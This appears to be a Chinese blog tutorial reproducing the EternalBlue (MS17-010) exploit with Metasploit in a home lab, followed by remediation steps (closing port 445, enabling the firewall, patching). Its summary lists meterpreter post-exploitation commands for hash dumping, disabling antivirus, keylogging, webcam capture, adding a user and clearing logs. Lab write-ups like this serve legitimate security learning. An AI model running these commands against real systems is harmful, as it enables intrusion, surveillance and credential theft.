ms17-010永恒之蓝漏洞复现

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

  • 前言
  • 一、测试环境准备
    • 1.安装VMware
    • 2.安装攻击机(kali镜像)
    • 1.安装靶机(win7)
  • 二、测试前准备工作
  • 三、开始测试
  • 总结
  • 修复方法


前言

学安先学法,禁止恶意攻击。该文章仅做学术交流使用,禁止恶意转载使用,本人不承担任何后果。

一、测试环境准备

1.安装VMware

so easy不做描述

2.安装攻击机(kali镜像)

使用清华的镜像。
ms17-010永恒之蓝漏洞复现_第1张图片so easy不做过多描述

1.安装靶机(win7)

同上

二、测试前准备工作

1、打开VMware,开启虚拟机kali与windows7。

2、查看靶机的ip地址,win+R开启命令行输入cmd并回车。开启的窗口里输入ipconfig。查看ipv4地址,我这里是192.168.41.146。
ms17-010永恒之蓝漏洞复现_第2张图片

3、关闭防火墙
ms17-010永恒之蓝漏洞复现_第3张图片ms17-010永恒之蓝漏洞复现_第4张图片ms17-010永恒之蓝漏洞复现_第5张图片ms17-010永恒之蓝漏洞复现_第6张图片ms17-010永恒之蓝漏洞复现_第7张图片

4、打开kali,ping一下靶机地址,能ping通则表示防火墙成功关闭。Ctrl+c取消操作。
ms17-010永恒之蓝漏洞复现_第8张图片

三、开始测试

第一步:使用kali自带的nmap工具扫描靶机ip,查看是否存在445端口,状态是否正常开启。
ms17-010永恒之蓝漏洞复现_第9张图片

第二步:开启matesploit。
在这里插入图片描述

第三步:寻找有关于永恒之蓝(ms17-010)的模块。
ms17-010永恒之蓝漏洞复现_第10张图片

第四步:使用第3个模块,检索目标靶机是否存在永恒之蓝漏洞。出现下图字样即代表存在。这里需要设置检索的地址,其他选项会自动默认设置。
ms17-010永恒之蓝漏洞复现_第11张图片

第五步:使用第0个模块,攻击目标靶机。这里需要设置payload,攻击的ip地址rhost,其他选项会自动默认设置。详细命令可查看总结。输入run或exploit开始攻击。
ms17-010永恒之蓝漏洞复现_第12张图片

显示以下字样即为攻击成功。
ms17-010永恒之蓝漏洞复现_第13张图片

成功后会显示meterpreter命令提示符,这里可以开展进一步的渗透工作,详细命令可查看总结。
ms17-010永恒之蓝漏洞复现_第14张图片

总结

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。在kali中,自带了Metasploit工具。

永恒之蓝通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

MSF后渗透命令:
切换到目标主机的windows shell:shell
从shell退出到meterpreter:exit
从meterpreter退出到MSF框架:background
查看获得的shell:sessions -l
切换到id为1的shell:sessions -i 1

进阶命令:
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\目录下
getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
run vnc #监控目标机桌面
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
clearev #清除日志

修复方法

(1)关闭445端口
1、win+r,打开regedit。
ms17-010永恒之蓝漏洞复现_第15张图片ms17-010永恒之蓝漏洞复现_第16张图片

2、找到注册表项:
“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”
新建一个值,32位或64位看自己选择,我选择的是QWORD。
ms17-010永恒之蓝漏洞复现_第17张图片

3、重命名该值为SMBDeviceEnabled。
在这里插入图片描述

4、右击修改该值,将数值数据改为0,点击确定,关闭窗口。
ms17-010永恒之蓝漏洞复现_第18张图片ms17-010永恒之蓝漏洞复现_第19张图片

5、win+r,打开services.msc。
ms17-010永恒之蓝漏洞复现_第20张图片

6、找到server服务,双击进入管理控制页面。把这个服务的启动类型更改为“禁用”,服务状态更改为“停止”,最后点击应用即可。
在这里插入图片描述ms17-010永恒之蓝漏洞复现_第21张图片

7、重启电脑生效。
ms17-010永恒之蓝漏洞复现_第22张图片

验证:
1、打开kali,ping一下靶机地址,可以ping通。(关闭了防火墙)
ms17-010永恒之蓝漏洞复现_第23张图片

2、nmap扫描,没有发现445端口。
ms17-010永恒之蓝漏洞复现_第24张图片

3、msf未检查到永恒之蓝漏洞。
ms17-010永恒之蓝漏洞复现_第25张图片

(2)开启防火墙
ms17-010永恒之蓝漏洞复现_第26张图片
ms17-010永恒之蓝漏洞复现_第27张图片
ms17-010永恒之蓝漏洞复现_第28张图片
ms17-010永恒之蓝漏洞复现_第29张图片
ms17-010永恒之蓝漏洞复现_第30张图片

(3)安装对应补丁
官网补丁地址:
点击直达https://support.microsoft.com/zh-cn/topic/microsoft-%E5%AE%89%E5%85%A8%E5%85%AC%E5%91%8A-4025685-%E5%8F%97%E6%94%AF%E6%8C%81%E5%B9%B3%E5%8F%B0%E6%8C%87%E5%AF%BC2017-%E5%B9%B4-6-%E6%9C%88-13-%E6%97%A5-d35efef9-190b-31f6-d155-b323eb76779f

这里我一直安装失败,没找到解决方案,不详细描述了。

欢迎交流,不定时持续更新。

你可能感兴趣的:(安全,linux,web安全,系统安全)